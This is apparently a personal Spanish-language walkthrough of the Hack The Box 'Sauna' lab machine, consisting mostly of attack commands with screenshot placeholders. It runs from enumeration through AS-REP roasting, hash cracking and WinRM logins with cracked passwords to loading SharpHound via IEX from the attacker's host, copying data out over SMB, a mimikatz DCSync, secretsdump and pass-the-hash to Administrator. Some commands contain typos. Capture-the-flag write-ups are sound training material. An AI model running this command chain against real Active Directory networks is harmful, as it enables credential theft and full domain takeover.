Cu3rv0x

nmap -A -p- -oA sauna 10.129.95.180 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA sauna 10.129.95.180

nmap -sU -O -p- -oA sauna-udp 10.129.95.180

nikto -h 10.129.95.180:80

Pasted image 20211213125131.png

Pasted image 20211213125601.png

whatweb http://10.129.95.180

Pasted image 20211213131310.png

rpcclient -U "" 10.129.95.180 -N

enumdomusers

Pasted image 20211213131751.png

Bajamos Kerbrute

git clone https://github.com/ropnop/kerbrute.git

go build -ldflags "-s -w"

du -hc kerbrute

Pasted image 20211213133209.png

upx kerbrute

Pasted image 20211213133254.png

Agregamos egotistical-bank.local a /etc/hosts

Pasted image 20211213134713.png

Para correr kerbrute necesitamos el dominio

crackmapexec smb 10.129.95.180

Pasted image 20211213134832.png

./kerbrute userenum --dc 10.129.95.180 -d egotistical-bank.local /usr/share/seclists/Usernames/top-usernames-shortlist.txt

Pasted image 20211213135005.png

smbclient -L 10.129.95.180 -N

Pasted image 20211213135909.png

smbmap -H 10.129.95.180 -u 'null'

smbmap -H 10.129.95.180

Pasted image 20211213140054.png

curl -s -X GET "http://10.129.95.180/about.html" | grep "p class=\mt-2"

Pasted image 20211213141121.png

curl -s -X GET "http://10.129.95.180/about.html" | grep "p class=\mt-2" | grep "Fergus Smith" -A 100 | html2text

Pasted image 20211213141420.png

curl -s -X GET "http://10.129.95.180/about.html" | grep "p class=\mt-2" | grep "Fergus Smith" -A 100 | html2text > users

Pasted image 20211213141625.png

cat users > backup

cat users | tr '[A-Z]' '[a-z]' | sponge users

Pasted image 20211213142007.png

Como no tengo contrasenas y solo usuarios hacemos lo siguiente, un asrep roast

python3 /opt/impacket/examples/GetNPUsers.py egotistical-bank.local/ -no-pass -usersfile users

Pasted image 20211213144832.png

cat hash

john --wordlist=/usr/share/worldlists/rockyou.txt hash

Pasted image 20211213145242.png

Conseguimos las credenciales:

fsmith:Thestrokes23

Pasted image 20211213145426.png

crackmapexec smb 10.129.95.180 -u 'fsmith' -p 'Thestrokes23'

Pasted image 20211213145642.png

evil-winrm -i 10.129.95.180 -u 'fsmith' -p 'Thestrokes23'

Pasted image 20211213145826.png

whoami /priv

Pasted image 20211213150834.png

Por ser parte de Remote Management Users logramos meternos por winrm

whoami /all

Pasted image 20211213151030.png

Creamos un directorio en Temp

Pasted image 20211213151349.png

Vemos que el reloj no esta correcto y sincronizarlo

Pasted image 20211213151758.png

sudo rdate -n 10.129.95.180

Pasted image 20211213152729.png

Lo corremos de nuevo y ahora si funciona

python3 /opt/impacket/examples/GetUserSPNs.py egotistical-bank.local/fsmith:Thestrokes23 -request

Pasted image 20211213152922.png

Bajamos winpeas

Pasted image 20211213153421.png

net user /domain

net user HSmith

Pasted image 20211213153732.png

upload winPEASx64.exe

Pasted image 20211213154011.png

Vemos como winPEAS despliega la contrasena

Pasted image 20211213155019.png

net user

net user svc_loanmgr

Pasted image 20211213155221.png

crackmapexec winrm 10.129.95.180 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'

Pasted image 20211213155322.png

evil-winrm -i 10.129.95.180 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'

Pasted image 20211213155424.png

Vemos los privilegios de este usuario

Pasted image 20211213160204.png

whoami /all

Pasted image 20211213160139.png

bloodhound &> /dev/null &

sudo neo4j console

Pasted image 20211213161910.png

https://github.com/puckiestyle/powershell/blob/master/SharpHound.ps1

Pasted image 20211213162718.png

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.135/SharpHound.ps1')

sudo python3 -m http.server 80

Pasted image 20211213163402.png

grep "Invoke-Bloodhound" SharpHound.ps1

Pasted image 20211213163502.png

Corremos ese comando y nos crea un comprimido

Invoke-BloodHound -CollectionMethod All

Pasted image 20211213163627.png

net use x: \\10.10.14.135\smbFolder /user:cu3rv0x password123

sudo python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd) -smb2support -username cu3rv0x -password password123

Pasted image 20211213164405.png

copy 2012..._Bloodhound.zip x:\2012...BloodHound.zip

Pasted image 20211213164559.png

Subimos el zip a bloodhound

Pasted image 20211213164732.png

Vamos a analysis-> Find AS-Rep Roastable users y le damos click

Pasted image 20211213165131.png

Click en list all kerberoastable accounts

Pasted image 20211213165236.png

Click en Find shortest path to domain admin

Pasted image 20211213165339.png

Buscamos a FSMITH

Pasted image 20211213165456.png

Escogemos mark as owned

Pasted image 20211213165526.png

Hacemos lo mismo para HSmith

Pasted image 20211213165612.png

Le damos click a find principals with DCsync rights

Vemos que svc_loanmgr tienen estos privilegios:

Pasted image 20211213170108.png

cp /usr/share/mimikatz/x64/mimikatz.exe .

Pasted image 20211213170308.png

sudo python3 -m http.server 80

Pasted image 20211213170610.png

Si no pones exit al final se genera un bucle infinito

C:\Windows\Temp\test\mimikatz.exe 'lsadump::dsync /domain:etotistical-bank.local /user:Administrator'

Pasted image 20211213171121.png

Usando Moneymakestheworldgoround! como passwd

python3 /opt/impacket/examples/secretsdump.py egotistical-bank.local/svc_loanmgr@10.129.95.180

Pasted image 20211213171722.png

Y hacemos un pass the hash con evilwinrm

evil-winrm -t 10.129.95.180 -u 'Administrator' -H 82345..

Pasted image 20211213171918.png